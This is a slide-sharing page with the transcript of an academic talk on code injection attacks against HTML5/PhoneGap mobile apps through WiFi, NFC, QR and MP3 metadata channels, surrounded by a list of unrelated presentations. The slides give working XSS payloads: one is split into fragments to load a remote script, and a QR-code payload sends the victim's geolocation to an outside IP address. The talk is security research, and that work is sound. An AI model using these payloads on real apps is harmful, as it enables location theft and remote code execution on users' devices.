Code Injection Attacks on HTML5-based Mobile Apps

Slides:



Advertisements
Similar presentations
Google Android Introduction to Mobile Computing. Android is part of the build a better phone process Open Handset Alliance produces Android Comprises.
Advertisements

The Ludei platform Iker Jamardo HTML5 LA 2013/06/10.
TouchDevelop Create apps ON your phone! Peli de Halleux (Senior Software Developer) Microsoft Research.
Samsung Smart TV is a web-based application running on an application engine installed on digital TVs connected to the Internet.
Developing downloadable mobile apps using HTML5 and PhoneGap Apache Callback Ron Perry, CTO, Worklight Inc.
GovCamp QLD 2012 Different approaches to mobile app development.
Developing Mobile Apps for Drupal Sites Manil Maskey Information Technology & Systems Center University of Alabama in Huntsville ESIP.
Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.
Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,
D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,
Javascript Introduction Norman White Material is from w3schools.com Go there to run examples interactively.
Authoring Languages and Web Authoring Software 4.01 Examine web page development and design.
Mobile App Development Using: Presented by Tyler Richey Images from
Richard Yu.  Present view of the world that is: Enhanced by computers Mix real and virtual sensory input  Most common AR is visual Mixed reality virtual.
Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.
1 Mobile Computing Mobile First (formerly Worklight) Copyright 2015 by Janson Industries.
Mobile Application Development
Today Microformats and a sprinkling of RDF Everyone good with SVN? Everyone checked something in? No? Try now. Mobile – Functionality – UX If you get too.
Phonegap Deployment CIS 136 Building Mobile Apps 1.
Anatomy of an App HTML, CSS, jQuery, jQuery Mobile CIS 136 Building Mobile Apps 1.
Introduction To Mobile Marketing SMS – text messaging, one way or two way communication Introduction To Mobile Marketing.
Social Media Apps Programming Min-Yuh Day, Ph.D. Assistant Professor Department of Information Management Tamkang University
Download the free ‘SCAN’ app to your mobile device.
TouchDevelop Create apps for all your devices
Web Programming – Java Script Association of Computing Activities Computer Science and Engineering Indian Institute of Technology Kanpur.
Lightning Talk Fred Rodriguez Nguyen Do CPSC 473 May 6, 2012.
Three-tier Mobile Application Testing Framework:
Java Mobile Apps with GWT & PhoneGap Josh Marinacci, webOS Developer Advocate.
Javascript: More features B. Ramamurthy 7/4/2014B. Ramamurthy, CSE651C1.
“A Project Managers Perspective” Presented by: Brian Fischer Houston Engineering, Inc. WLIA Conference, 02/14/2013 A JOURNEY THRU MOBILE APP DEVELOPMENT.
HTML5 for Mobile Andrew Kinai. HTML vs HTML5 HTML:A language that describes documents' formatting and content, which is basically composed of static text.
HTML CSS JAVASCRIPT. HTML - Stands for Hyper Text Markup Language HTML is a ‘language’ that describes web pages. This language is a collection of codes.
Social Media Apps Programming Min-Yuh Day, Ph.D. Assistant Professor Department of Information Management Tamkang University
2011/12/20 1 Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin Syracuse University ACSAC 2011.
Mobile web Sebastian Lopienski IT Technical Forum 29 June 2012.
Social Media Apps Programming Min-Yuh Day, Ph.D. Assistant Professor Department of Information Management Tamkang University
The way of hybrid mobile development Hybrid Mobile Applications Telerik Software Academy
 Phone Gap is a mobile application development frame work based upon the open source apache cordova project. Developed by Nitobi software Bought by Adobe.
Building Native Apps with ArcGIS API for JavaScript Using PhoneGap and jQuery Andy Gup, Lloyd Heberlie.
Software for Cyber Hygiene © 2014 Project Lead The Way, Inc.Computer Science and Software Engineering.
Javascript Overview. What is Javascript? May be one of the most popular programming languages ever Runs in the browser, not on the server All modern browsers.
Advantages of using PhoneGap for Mobile App Development
Chapter 1 Murach's JavaScript and jQuery, C1© 2012, Mike Murach & Associates, Inc.Slide 1.
Course Program, Evaluation, Exams Doncho Minkov Telerik Software Academy academy.telerik.com Senior Technical Trainer
Mobile Applications With JQuery Mobile and VDF 17.1.
PhoneGap / PhoneGap Build #CreateTheWeb Mihai Corlan / Adobe Web Evangelist
丁建文 國立高雄應用科大資管系副教授 兼任計網中心軟體發展組組長 跨平台行動應用軟體開發技術 : HTML5 & Mobile JavaScript Framework 暨南大學.
JavaScript 사용현황 김민철. Table of contents  1. Mobile  WAC  PhoneGap  AppsPresso  2. TV  Samsung Smart TV  KT IPTV  3. 기타  node.js 2.
Android and IOS Permissions Why are they here and what do they want from me?
APP DESIGN AND DEVELOPMENT WITH THE IONIC FRAMEWORK Chuck Leone
MEDIA KIT. WHO WE ARE? YOUR TEXT HERE 6:58 min AVG. SESSION DURATION 13.6M+ UNIQUE USERS 2.8M+ FACEBOOK LIKES 189M+ MONTHLY PAGE VIEWS 71.3M+ RETURNING.
#SummitNow Alfresco Mobile SDKs in Action 06 November, 2013 Mike Hatfield Lead Engineer Mobile Apps, Alfresco.
INTRO TO MOBILE APPS 8 th period Mrs. Logan. WHAT IS AN APP? a self-contained program or piece of software designed to fulfill a particular purpose; an.
Phonegap API & Phonegap Bridge CIS 136 Building Mobile Apps 1.
PhoneGap. web-based mobile development framework, based on the open-source Cordova project. use standard web technologies such as HTML5, CSS3, and JavaScript.
Development of Internet Applications HTML5 Ing. Jan Janoušek 7.
Mobile App Development Using:
PhoneGap, Processing.
Week-12 (Lecture-1) Cascading Style Sheets (CSS): describe how documents are presented on screens. Types of Style Sheets: External Style Sheet - Define.
ET-570 Smart Phone Apps.
Content Introduction Technology Used to Develop Mobile Application
Apache Cordova Overview
Automatic Mobile App Generation
ITI 133 HTML5 Desktop and Mobile Level I
Who Am I? appMobi's lead HTML5 game developer / evangelist
Phonegap Bridge Configuration file
Apache Cordova What is it ? Platforms Development Architecture Plugins
Dear 6th Grade Families, I’d like to welcome you and your child to the 6th grade at ESUMS. This year, the 6th grade team will be using Remind to help.
Murach's JavaScript and jQuery (3rd Ed.)
© 2017, Mike Murach & Associates, Inc.
Presentation transcript:

Code Injection Attacks on HTML5-based Mobile Apps Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University .

(a) (b) (c) (d) (e) (f) (g) (h)

Outline BackGround Code Injection Attacks on HTML5-based mobile apps Overview of HTML5-based Mobile App Overview of PhoneGap Architecture Risks in JavaScript Code Injection Attacks on HTML5-based mobile apps Overview of the Attack Channels of the Attack Examples (WIFI, NFC, MP3) Length limitation Real Vulnerable Cases Future Work

Overview of HTML5-based Mobile App PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification … Advantage: Can be easily ported between different platforms X X

Overview of PhoneGap Architecture

Risks in JavaScript Data and code can be mixed together. var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.

Overview of the Attack

Overview of the Attack 2 3 1

Channels of XDS Attack ID Channels (WiFi, Bluetooth) Data Channels Unique to Mobile Devices (NFC, Barcode, SMS) Metadata Channels (MP3, MP4, Image) For the channels we have identified in this paper, we categorized them into three categories. The first one is the ID channels, we can embed code into some identities, e.g., the WiFi SSID, Bluetooth name. The second one is data channels unique to mobile devices, including NFC, Barcode and SMS. The third one is the metadata channels. Media data, e.g., MP3, MP4, Image, they use metadata to describe the detail information of the files, including artist, album, model. We can also successfully inject code into these metadata Fields. Next I will pick one example in each category to show how the attack works.

Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder

Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App

Example 3(mp3) Non PhoneGap Mp3 App PhoneGap Mp3 App http://www.cis.syr.edu/~wedu/attack Non PhoneGap Mp3 App PhoneGap Mp3 App

Length Limitation of Channels

Overcome the limitation Use External JS files: <script src=//mu.gl></script> ( will be filter out by innerHTML) Split JS code into pieces: <img src onerror=$.getScript('http://mu.gl')> (need to use jQuery) 1 <img src onerror=a="$.getScr"> 2 <img src onerror=b="ipt('ht"> 3 <img src onerror=c="tp://mu."> 4 <img src onerror=d="gl')"> 5 <img src onerror=eval(a+b+c+d)>

Real vulnerable cases Downloaded 764 PhoneGap apps from Google Play Find several vulnerable apps satisfy two attack conditions: read external data from the channels that we have identified use vulnerable APIs or attributes to display information from the channels

Real Vulnerable Cases Information sent to Sever Non PhoneGap App

Real vulnerable Cases The code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m='Latitude:'+loc.coords.latitude+ '\n'+'Longitude:'+loc.coords.longitude; alert(m); b=document.createElement('img'); b.src='http://128.230.213.66:5556?c='+m })>

Future Work Large Scale analysis of HTML5-based mobile apps Solution to address the attack

Thanks! Q & A

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.